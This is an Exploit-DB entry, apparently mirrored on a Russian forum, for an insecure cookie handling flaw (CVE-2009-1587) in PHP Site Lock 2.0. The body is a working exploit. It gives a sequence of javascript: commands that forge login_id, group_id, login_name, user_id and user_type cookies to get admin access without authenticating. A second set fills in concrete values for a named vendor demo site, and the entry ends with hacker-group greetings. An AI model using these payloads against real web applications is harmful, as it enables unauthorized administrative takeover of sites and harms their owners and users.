- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8604
- Проверка EDB
-
- Пройдено
- Автор
- THE G0BL!N
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-1587
- Дата публикации
- 2009-05-04
Код:
-------------------------------------[+]
Homepage:http://www.kalptarudemos.com
Product: PHP Site Lock 2.0
home:www.h4ckf0ru.com
-------------------------------------
PHP Site Lock 2.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------
1)javascript:document.cookie="login_id=0;path=/";
1)javascript:document.cookie="group_id=[id grroup admin];path=/";
2)javascript:document.cookie="login_name=[admin name];path=/";
3)javascript:document.cookie="user_id=[user id ];path=/";
4)javascript:document.cookie="user_type=[admin Type];path=/";
Then Go to url: http://victim/[path]/index.php
demo
----
http://www.kalptarudemos.com/demo/phpsitelock/index.php?page=adminlogin
exploit for dem0
----------------
1)javascript:document.cookie="login_id=0;path=/";
2)javascript:document.cookie="group_id=1;path=/";
3)javascript:document.cookie="login_name=admin;path=/";
4)javascript:document.cookie="user_id=1;path=/";
5)javascript:document.cookie="user_type=admin;path=/";
Note: The operation is not worked by assemble The Information :)
Put it one after one :)
--------------------------------------------------
Greetz to :
[+] Super_Cristal (My Master) - His0k4- Dos-Dz Team Snakes TeaM
SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone- ZoRLu
ALL My Friends (Dz)
[+]-------------------------------------[+]
# milw0rm.com [2009-05-04]- Источник
- www.exploit-db.com
